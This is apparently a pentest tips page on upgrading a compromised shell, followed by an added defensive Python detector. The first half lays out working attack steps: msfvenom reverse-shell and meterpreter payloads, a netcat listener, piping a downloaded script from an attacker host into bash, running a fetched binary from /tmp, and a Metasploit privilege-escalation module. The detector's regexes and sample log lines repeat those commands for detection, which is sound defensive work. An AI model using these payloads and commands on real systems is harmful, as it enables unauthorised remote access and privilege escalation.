Pentest Tips

Shell Upgrades

Using Python Pty

# In the dumb shell
python -c 'import pty; pty.spawn("/bin/bash")'

# Press ^Z (Ctrl+Z) to suspend the netcat session, then type
stty raw -echo; fg

Metasploit (Linux):

Generate your payloads:

msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=1234 -f raw > shell.sh

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.bin

Start listener and server:

python3 -m http.server
nc -nlvp 1234

Use your unstable shell to download and run the stable shell script:

curl <ip>:8000/shell.sh | bash

Start your meterpreter listener:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
exploit

Download your meterpreter payload and run it:

curl -o /tmp/shell.bin <ip>:8000/shell-x86.bin
chmod +x /tmp/shell.bin
cd /tmp
./shell.bin

Elevate the shell's permissions:

^Z
use post/multi/recon/local_exploit_suggester
exploit
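
From the defender's side, each step above leaves a recognisable command line. The following is an added example, not part of the original page, that flags those patterns in command-line telemetry and correlates a download into /tmp with a later chmod on the same file. The log format, rule names and service-account list are assumptions, and the sample lines are constructed.

```python
import re

# Assumed log format (hypothetical): "<ts> user=<name> parent=<proc> cmd=<shell command string>"
LINE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")
SERVICE_USERS = {"www-data", "apache", "nginx", "tomcat"}  # accounts that should never run these

# Rule names are hypothetical; each pattern corresponds to a command shown on this page.
RULES = [
    ("pty_spawn", re.compile(r"\bpython[\d.]*\s+-c\s+.*\bpty\.spawn\(")),
    ("pipe_to_shell", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|da|z)?sh\b")),
    ("tmp_download", re.compile(r"\bcurl\b.*\s-o\s+(/tmp/\S+)")),
    ("tmp_chmod_exec", re.compile(r"\bchmod\s+\+x\s+(/tmp/\S+)")),
]

def scan(lines):
    """Return (ts, user, rule, severity) for every rule hit, in input order."""
    findings, downloaded = [], set()  # downloaded: (user, path) pairs fetched into /tmp
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        user, cmd = m["user"], m["cmd"]
        for name, rx in RULES:
            hit = rx.search(cmd)
            if not hit:
                continue
            sev = "high" if user in SERVICE_USERS else "medium"
            if name == "tmp_download":
                downloaded.add((user, hit.group(1)))
            elif name == "tmp_chmod_exec" and (user, hit.group(1)) in downloaded:
                # Same account fetched this file and then made it executable.
                name, sev = "staged_binary", "high"
            findings.append((m["ts"], user, name, sev))
    return findings

SAMPLE = [  # constructed lines, not real telemetry
    "2024-01-01T10:00:01Z user=www-data parent=sh cmd=python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "2024-01-01T10:00:40Z user=www-data parent=bash cmd=curl 203.0.113.5:8000/shell.sh | bash",
    "2024-01-01T10:02:10Z user=www-data parent=bash cmd=curl -o /tmp/shell.bin 203.0.113.5:8000/shell-x86.bin",
    "2024-01-01T10:02:15Z user=www-data parent=bash cmd=chmod +x /tmp/shell.bin",
    "2024-01-01T11:00:00Z user=alice parent=bash cmd=chmod +x /tmp/build.sh",
    "2024-01-01T11:05:00Z user=alice parent=bash cmd=curl -o /home/alice/notes.txt https://example.org/notes.txt",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

A chmod on a /tmp file by an interactive user stays at medium on its own; it is the pairing with a prior download by the same account, or execution under a service account, that raises it to high.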

Last updated 2 years ago